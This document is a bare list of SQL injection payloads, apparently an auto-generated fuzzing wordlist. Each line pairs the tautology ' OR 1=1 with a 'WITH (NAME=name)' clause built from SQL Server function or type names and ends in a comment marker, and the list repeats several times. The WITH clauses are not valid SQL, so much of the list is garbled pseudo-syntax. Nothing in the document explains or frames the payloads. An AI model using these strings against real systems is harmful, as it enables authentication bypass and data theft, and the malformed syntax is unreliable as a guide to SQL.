' OR 1=1 WITH (AT TIME ZONE=at_time_zone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
' OR 1=1 WITH (STR=str)--
' OR 1=1 WITH (ASCII=ascii)--
' OR 1=1 WITH (UNICODE=unicode)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (SOUNDEX=soundex)--
' OR 1=1 WITH (DIFFERENCE=difference)--
' OR 1=1 WITH (QUOTENAME=quotename)--
' OR 1=1 WITH (PARSENAME=parsename)--
' OR 1=1 WITH (ISNUMERIC=isnumeric)--
' OR 1=1 WITH (ISJSON=isjson)--
' OR 1=1 WITH (JSON_VALUE=json_value)--
' OR 1=1 WITH (JSON_QUERY=json_query)--
' OR 1=1 WITH (JSON_MODIFY=json_modify)--
' OR 1=1 WITH (OPENJSON=openjson)--
' OR 1=1 WITH (FOR JSON=for_json)--
' OR 1=1 WITH (JSON_PATH_EXISTS=json_path_exists)--
' OR 1=1 WITH (JSON_ARRAY=json_array)--
' OR 1=1 WITH (JSON_OBJECT=json_object)--
' OR 1=1 WITH (JSON_ARRAY_AGG=json_array_agg)--
' OR 1=1 WITH (JSON_OBJECT_AGG=json_object_agg)--
' OR 1=1 WITH (IS_XML=is_xml)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (FOR XML=for_xml)--
' OR 1=1 WITH (XML_SCHEMA=xml_schema)--
' OR 1=1 WITH (XML_SCHEMA_NAMESPACE=xml_schema_namespace)--
' OR 1=1 WITH (XML_DATATYPE=xml_datatype)--
' OR 1=1 WITH (XML_INDEX=xml_index)--
' OR 1=1 WITH (XML_VIEW=xml_view)--
' OR 1=1 WITH (XML_COLLECTION=xml_collection)--
' OR 1=1 WITH (XML_TEMPLATE=xml_template)--
' OR 1=1 WITH (XML_LOB=xml_lob)--
' OR 1=1 WITH (XML_SCHEMA_COLLECTION=xml_schema_collection)--
' OR 1=1 WITH (XML_INDEX_VIEW=xml_index_view)--
' OR 1=1 WITH (XML_NAMESPACE=xml_namespace)--
' OR 1=1 WITH (XML_DATA_TYPE=xml_data_type)--
' OR 1=1 WITH (XML_FORMAT=xml_format)--
' OR 1=1 WITH (XML_STORAGE=xml_storage)--
' OR 1=1 WITH (XML_PROCESSING=xml_processing)--
' OR 1=1 WITH (XML_VALIDATION=xml_validation)--
' OR 1=1 WITH (XML_SERIALIZATION=xml_serialization)--
' OR 1=1 WITH (XML_COMPRESSION=xml_compression)--
' OR 1=1 WITH (XML_ENCRYPTION=xml_encryption)--
' OR 1=1 WITH (XML_SIGNATURE=xml_signature)--
' OR 1=1 WITH (XML_TRANSFORM=xml_transform)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (XML_FOR=xml_for)--
' OR 1=1 WITH (XML_AUTO=xml_auto)--
' OR 1=1 WITH (XML_EXPLICIT=xml_explicit)--
' OR 1=1 WITH (XML_RAW=xml_raw)--
' OR 1=1 WITH (XML_PATH=xml_path)--
' OR 1=1 WITH (XML_ELEMENTS=xml_elements)--
' OR 1=1 WITH (XML_BINARY_BASE64=xml_binary_base64)--
' OR 1=1 WITH (XML_TYPE=xml_type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY_BASE64=binary_base64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncate_year)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=date_format)--
' OR 1=1 WITH (TIME_FORMAT=time_format)--
' OR 1=1 WITH (DATETIME_FORMAT=datetime_format)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestamp_format)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
' OR 1=1 WITH (AT TIME ZONE=at_time_zone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
' OR 1=1 WITH (STR=str)--
' OR 1=1 WITH (ASCII=ascii)--
' OR 1=1 WITH (UNICODE=unicode)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (SOUNDEX=soundex)--
' OR 1=1 WITH (DIFFERENCE=difference)--
' OR 1=1 WITH (QUOTENAME=quotename)--
' OR 1=1 WITH (PARSENAME=parsename)--
' OR 1=1 WITH (ISNUMERIC=isnumeric)--
' OR 1=1 WITH (ISJSON=isjson)--
' OR 1=1 WITH (JSON_VALUE=json_value)--
' OR 1=1 WITH (JSON_QUERY=json_query)--
' OR 1=1 WITH (JSON_MODIFY=json_modify)--
' OR 1=1 WITH (OPENJSON=openjson)--
' OR 1=1 WITH (FOR JSON=for_json)--
' OR 1=1 WITH (JSON_PATH_EXISTS=json_path_exists)--
' OR 1=1 WITH (JSON_ARRAY=json_array)--
' OR 1=1 WITH (JSON_OBJECT=json_object)--
' OR 1=1 WITH (JSON_ARRAY_AGG=json_array_agg)--
' OR 1=1 WITH (JSON_OBJECT_AGG=json_object_agg)--
' OR 1=1 WITH (IS_XML=is_xml)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (FOR XML=for_xml)--
' OR 1=1 WITH (XML_SCHEMA=xml_schema)--
' OR 1=1 WITH (XML_SCHEMA_NAMESPACE=xml_schema_namespace)--
' OR 1=1 WITH (XML_DATATYPE=xml_datatype)--
' OR 1=1 WITH (XML_INDEX=xml_index)--
' OR 1=1 WITH (XML_VIEW=xml_view)--
' OR 1=1 WITH (XML_COLLECTION=xml_collection)--
' OR 1=1 WITH (XML_TEMPLATE=xml_template)--
' OR 1=1 WITH (XML_LOB=xml_lob)--
' OR 1=1 WITH (XML_SCHEMA_COLLECTION=xml_schema_collection)--
' OR 1=1 WITH (XML_INDEX_VIEW=xml_index_view)--
' OR 1=1 WITH (XML_NAMESPACE=xml_namespace)--
' OR 1=1 WITH (XML_DATA_TYPE=xml_data_type)--
' OR 1=1 WITH (XML_FORMAT=xml_format)--
' OR 1=1 WITH (XML_STORAGE=xml_storage)--
' OR 1=1 WITH (XML_PROCESSING=xml_processing)--
' OR 1=1 WITH (XML_VALIDATION=xml_validation)--
' OR 1=1 WITH (XML_SERIALIZATION=xml_serialization)--
' OR 1=1 WITH (XML_COMPRESSION=xml_compression)--
' OR 1=1 WITH (XML_ENCRYPTION=xml_encryption)--
' OR 1=1 WITH (XML_SIGNATURE=xml_signature)--
' OR 1=1 WITH (XML_TRANSFORM=xml_transform)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (XML_FOR=xml_for)--
' OR 1=1 WITH (XML_AUTO=xml_auto)--
' OR 1=1 WITH (XML_EXPLICIT=xml_explicit)--
' OR 1=1 WITH (XML_RAW=xml_raw)--
' OR 1=1 WITH (XML_PATH=xml_path)--
' OR 1=1 WITH (XML_ELEMENTS=xml_elements)--
' OR 1=1 WITH (XML_BINARY_BASE64=xml_binary_base64)--
' OR 1=1 WITH (XML_TYPE=xml_type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY_BASE64=binary_base64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncate_year)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=date_format)--
' OR 1=1 WITH (TIME_FORMAT=time_format)--
' OR 1=1 WITH (DATETIME_FORMAT=datetime_format)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestamp_format)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
' OR 1=1 WITH (AT TIME ZONE=at_time_zone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
' OR 1=1 WITH (STR=str)--
' OR 1=1 WITH (ASCII=ascii)--
' OR 1=1 WITH (UNICODE=unicode)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (SOUNDEX=soundex)--
' OR 1=1 WITH (DIFFERENCE=difference)--
' OR 1=1 WITH (QUOTENAME=quotename)--
' OR 1=1 WITH (PARSENAME=parsename)--
' OR 1=1 WITH (ISNUMERIC=isnumeric)--
' OR 1=1 WITH (ISJSON=isjson)--
' OR 1=1 WITH (JSON_VALUE=json_value)--
' OR 1=1 WITH (JSON_QUERY=json_query)--
' OR 1=1 WITH (JSON_MODIFY=json_modify)--
' OR 1=1 WITH (OPENJSON=openjson)--
' OR 1=1 WITH (FOR JSON=for_json)--
' OR 1=1 WITH (JSON_PATH_EXISTS=json_path_exists)--
' OR 1=1 WITH (JSON_ARRAY=json_array)--
' OR 1=1 WITH (JSON_OBJECT=json_object)--
' OR 1=1 WITH (JSON_ARRAY_AGG=json_array_agg)--
' OR 1=1 WITH (JSON_OBJECT_AGG=json_object_agg)--
' OR 1=1 WITH (IS_XML=is_xml)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (FOR XML=for_xml)--
' OR 1=1 WITH (XML_SCHEMA=xml_schema)--
' OR 1=1 WITH (XML_SCHEMA_NAMESPACE=xml_schema_namespace)--
' OR 1=1 WITH (XML_DATATYPE=xml_datatype)--
' OR 1=1 WITH (XML_INDEX=xml_index)--
' OR 1=1 WITH (XML_VIEW=xml_view)--
' OR 1=1 WITH (XML_COLLECTION=xml_collection)--
' OR 1=1 WITH (XML_TEMPLATE=xml_template)--
' OR 1=1 WITH (XML_LOB=xml_lob)--
' OR 1=1 WITH (XML_SCHEMA_COLLECTION=xml_schema_collection)--
' OR 1=1 WITH (XML_INDEX_VIEW=xml_index_view)--
' OR 1=1 WITH (XML_NAMESPACE=xml_namespace)--
' OR 1=1 WITH (XML_DATA_TYPE=xml_data_type)--
' OR 1=1 WITH (XML_FORMAT=xml_format)--
' OR 1=1 WITH (XML_STORAGE=xml_storage)--
' OR 1=1 WITH (XML_PROCESSING=xml_processing)--
' OR 1=1 WITH (XML_VALIDATION=xml_validation)--
' OR 1=1 WITH (XML_SERIALIZATION=xml_serialization)--
' OR 1=1 WITH (XML_COMPRESSION=xml_compression)--
' OR 1=1 WITH (XML_ENCRYPTION=xml_encryption)--
' OR 1=1 WITH (XML_SIGNATURE=xml_signature)--
' OR 1=1 WITH (XML_TRANSFORM=xml_transform)--
' OR 1=1 WITH (XML_QUERY=xml_query)--
' OR 1=1 WITH (XML_VALUE=xml_value)--
' OR 1=1 WITH (XML_EXIST=xml_exist)--
' OR 1=1 WITH (XML_MODIFY=xml_modify)--
' OR 1=1 WITH (XML_NODES=xml_nodes)--
' OR 1=1 WITH (XML_OPENXML=xml_openxml)--
' OR 1=1 WITH (XML_BULKLOAD=xml_bulkload)--
' OR 1=1 WITH (XML_FOR=xml_for)--
' OR 1=1 WITH (XML_AUTO=xml_auto)--
' OR 1=1 WITH (XML_EXPLICIT=xml_explicit)--
' OR 1=1 WITH (XML_RAW=xml_raw)--
' OR 1=1 WITH (XML_PATH=xml_path)--
' OR 1=1 WITH (XML_ELEMENTS=xml_elements)--
' OR 1=1 WITH (XML_BINARY_BASE64=xml_binary_base64)--
' OR 1=1 WITH (XML_TYPE=xml_type)--
' OR 1=1 WITH (XMLSCHEMA=xmlschema)--
' OR 1=1 WITH (XMLDATA=xmldata)--
' OR 1=1 WITH (XMLNAMESPACES=xmlnamespaces)--
' OR 1=1 WITH (XSINIL=xsinil)--
' OR 1=1 WITH (ROOT=root)--
' OR 1=1 WITH (BINARY_BASE64=binary_base64)--
' OR 1=1 WITH (TRUNCATE_YEAR=truncate_year)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (DATE_FORMAT=date_format)--
' OR 1=1 WITH (TIME_FORMAT=time_format)--
' OR 1=1 WITH (DATETIME_FORMAT=datetime_format)--
' OR 1=1 WITH (TIMESTAMP_FORMAT=timestamp_format)--
' OR 1=1 WITH (DECIMAL=decimal)--
' OR 1=1 WITH (FLOAT=float)--
' OR 1=1 WITH (REAL=real)--
' OR 1=1 WITH (MONEY=money)--
' OR 1=1 WITH (SMALLMONEY=smallmoney)--
' OR 1=1 WITH (NUMERIC=numeric)--
' OR 1=1 WITH (SMALLINT=smallint)--
' OR 1=1 WITH (TINYINT=tinyint)--
' OR 1=1 WITH (BIT=bit)--
' OR 1=1 WITH (BIGINT=bigint)--
' OR 1=1 WITH (INT=int)--
' OR 1=1 WITH (CHAR=char)--
' OR 1=1 WITH (VARCHAR=varchar)--
' OR 1=1 WITH (TEXT=text)--
' OR 1=1 WITH (NCHAR=nchar)--
' OR 1=1 WITH (NVARCHAR=nvarchar)--
' OR 1=1 WITH (NTEXT=ntext)--
' OR 1=1 WITH (BINARY=binary)--
' OR 1=1 WITH (VARBINARY=varbinary)--
' OR 1=1 WITH (IMAGE=image)--
' OR 1=1 WITH (UNIQUEIDENTIFIER=uniqueidentifier)--
' OR 1=1 WITH (SQL_VARIANT=sql_variant)--
' OR 1=1 WITH (TABLE=table)--
' OR 1=1 WITH (CURSOR=cursor)--
' OR 1=1 WITH (TIMESTAMP=timestamp)--
' OR 1=1 WITH (HIERARCHYID=hierarchyid)--
' OR 1=1 WITH (GEOMETRY=geometry)--
' OR 1=1 WITH (GEOGRAPHY=geography)--
' OR 1=1 WITH (DATETIME=datetime)--
' OR 1=1 WITH (SMALLDATETIME=smalldatetime)--
' OR 1=1 WITH (DATETIME2=datetime2)--
' OR 1=1 WITH (DATETIMEOFFSET=datetimeoffset)--
' OR 1=1 WITH (DATE=date)--
' OR 1=1 WITH (TIME=time)--
' OR 1=1 WITH (DATETRUNC=datetrunc)--
' OR 1=1 WITH (EOMONTH=eomonth)--
' OR 1=1 WITH (SWITCHOFFSET=switchoffset)--
' OR 1=1 WITH (TODATETIMEOFFSET=todatetimeoffset)--
' OR 1=1 WITH (AT TIME ZONE=at_time_zone)--
' OR 1=1 WITH (ISDATE=isdate)--
' OR 1=1 WITH (DAY=day)--
' OR 1=1 WITH (MONTH=month)--
' OR 1=1 WITH (YEAR=year)--
' OR 1=1 WITH (DATENAME=datename)--
' OR 1=1 WITH (DATEPART=datepart)--
' OR 1=1 WITH (GETDATE=getdate)--
' OR 1=1 WITH (GETUTCDATE=getutcdate)--
' OR 1=1 WITH (SYSDATETIME=sysdatetime)--
' OR 1=1 WITH (SYSUTCDATETIME=sysutcdatetime)--
' OR 1=1 WITH (SYSDATETIMEOFFSET=sysdatetimeoffset)--
' OR 1=1 WITH (CURRENT_TIMESTAMP=current_timestamp)--
' OR 1=1 WITH (CURRENT_TIMEZONE=current_timezone)--
' OR 1=1 WITH (DATEDIFF=datediff)--
' OR 1=1 WITH (DATEADD=dateadd)--
' OR 1=1 WITH (ISNULL=isnull)--
' OR 1=1 WITH (NULLIF=nullif)--
' OR 1=1 WITH (COALESCE=coalesce)--
' OR 1=1 WITH (IIF=iif)--
' OR 1=1 WITH (CHOOSE=choose)--
' OR 1=1 WITH (TRY_CAST=try_cast)--
' OR 1=1 WITH (TRY_CONVERT=try_convert)--
' OR 1=1 WITH (TRY_PARSE=try_parse)--
' OR 1=1 WITH (PARSE=parse)--
' OR 1=1 WITH (FORMAT=format)--
' OR 1=1 WITH (CONCAT=concat)--
' OR 1=1 WITH (CONCAT_WS=concat_ws)--
' OR 1=1 WITH (STRING_AGG=string_agg)--
' OR 1=1 WITH (STRING_SPLIT=string_split)--
' OR 1=1 WITH (STRING_ESCAPE=string_escape)--
' OR 1=1 WITH (TRANSLATE=translate)--
' OR 1=1 WITH (TRIM=trim)--
' OR 1=1 WITH (LTRIM=ltrim)--
' OR 1=1 WITH (RTRIM=rtrim)--
' OR 1=1 WITH (UPPER=upper)--
' OR 1=1 WITH (LOWER=lower)--
' OR 1=1 WITH (REVERSE=reverse)--
' OR 1=1 WITH (REPLICATE=replicate)--
' OR 1=1 WITH (SPACE=space)--
' OR 1=1 WITH (STUFF=stuff)--
' OR 1=1 WITH (SUBSTRING=substring)--
' OR 1=1 WITH (LEFT=left)--
' OR 1=1 WITH (RIGHT=right)--
' OR 1=1 WITH (CHARINDEX=charindex)--
' OR 1=1 WITH (PATINDEX=patindex)--
' OR 1=1 WITH (REPLACE=replace)--
